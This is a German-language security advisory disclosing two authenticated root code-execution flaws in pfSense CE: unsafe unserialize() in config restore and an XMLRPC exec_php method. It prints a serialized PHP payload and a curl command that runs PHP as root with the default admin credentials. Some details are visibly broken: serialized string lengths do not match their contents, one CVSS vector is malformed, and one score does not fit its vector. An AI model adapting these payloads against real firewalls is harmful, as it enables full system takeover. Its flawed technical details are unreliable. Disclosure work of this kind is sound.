
Authentifizierte RCE in Netgate pfSense CE 2.7.2 und 2.8.0
Authentifizierte Remote-Codeausführung in Netgate pfSense Community Edition
| Feld | Details |
|---|---|
| Forscher | Nelson Adhepeau (@privlabs) |
| Anbieter | Netgate |
| Produkt | pfSense Community Edition |
| Versionen | 2.7.2 und 2.8.0 |
| Typ | Authentifizierte Remote-Codeausführung |
| Offenlegung | Februar 2026 |
| Anbieter benachrichtigt | 2. Dezember 2025 |
| CVE zugewiesen | 28. Januar 2026 |
Diese Forschung wurde in isolierten Laborumgebungen ausschließlich zu Bildungs- und Sicherheitsbewusstseinszwecken durchgeführt. Alle Erkenntnisse wurden dem Anbieter vor der Veröffentlichung verantwortungsvoll offengelegt. Dieser Sicherheitshinweis stellt keine Einladung dar, Produktionssysteme anzugreifen. Unautorisierte Tests sind illegal.
Der Wiederherstellungsmechanismus der pfSense-Konfiguration ruft unserialize() für
vom Benutzer kontrollierte Daten auf, ohne Klassen-Whitelisting, Eingabevalidierung
oder Sandboxing.
Eine manipulierte Sicherungsdatei, die ein bösartiges serialisiertes PHP-Objekt enthält,
injiziert beliebige Befehle über die Eigenschaft post_reboot_commands, die über
mwexec() mit vollständigen Root-Rechten ausgeführt werden.
[Attacker] → Login as admin
→ Upload malicious .xml backup file
→ Trigger restore
→ pfSense calls unserialize() on attacker data
→ post_reboot_commands executed via mwexec()
→ [ROOT SHELL]
config.php — Verarbeitungslogik der Wiederherstellungpfsense_module_installer — Ziel der unsicheren Deserialisierungmwexec() — Senke für die BefehlsausführungO:23:"pfsense_module_installer":1:{
s:17:"*post_reboot_commands";
a:1:{
i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
}
}
"Bestätigt. Als authentifizierter administrativer Missbrauch eingestuft. Es wird kein Patch veröffentlicht." — Netgate
pfSense CE 2.8.0 bietet eine XMLRPC-Methode pfsense.exec_php an, die
beliebigen PHP-Code als Root ausführt – ohne Validierung, Sandboxing
oder irgendeine Form von Einschränkung.
Der Endpunkt ist:
admin:pfsense) ausnutzbar[Attacker] → Send XMLRPC request to /xmlrpc.php
→ Authenticate with admin:pfsense (default)
→ Call pfsense.exec_php with arbitrary PHP
→ Code executes as root, no sandboxing
→ [ROOT SHELL]
xmlrpc.php — API-Einstiegspunktpfsense.exec_php — unsichere dynamische Codeausführungcurl -k -u admin:pfsense \
-H "Content-Type: text/xml" \
-d '<methodCall>
<methodName>pfsense.exec_php</methodName>
<params>
<param>
<value><string>system("id");</string></value>
</param>
</params>
</methodCall>' \
https://<target>/xmlrpc.php
"Bestätigt. Als erwartetes Verhalten für authentifizierte Benutzer eingestuft. Kein Patch geplant." — Netgate
November 2025 → Vulnerabilities discovered
December 2, 2025 → Responsible disclosure to Netgate
→ Vendor acknowledged, no patch planned
January 28, 2026 → CVE IDs assigned by MITRE
February 2026 → Public disclosure
[email protected]Nelson Adhepeau — Unabhängiger Sicherheitsforscher
| Feld | Wert |
|---|
| CVSS v3.1 | 8.8 (Hoch) |
| Vektor | AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-502, CWE-915 |
| Angriffstyp | Authentifiziert (Admin) |
| Komponente | Backup-/Restore-Mechanismus |
| Feld | Wert |
|---|
| CVSS v3.1 | 9.9 (Kritisch) |
| Vektor | AV:N/AC:L/PR:L/UI:N/S:C:C/H:I/H:A:H |
| CWE | CWE-284, CWE-915 |
| Angriffstyp | Authentifiziert (Remote, Basic Auth) |
| Komponente | XMLRPC-API — pfsense.exec_php |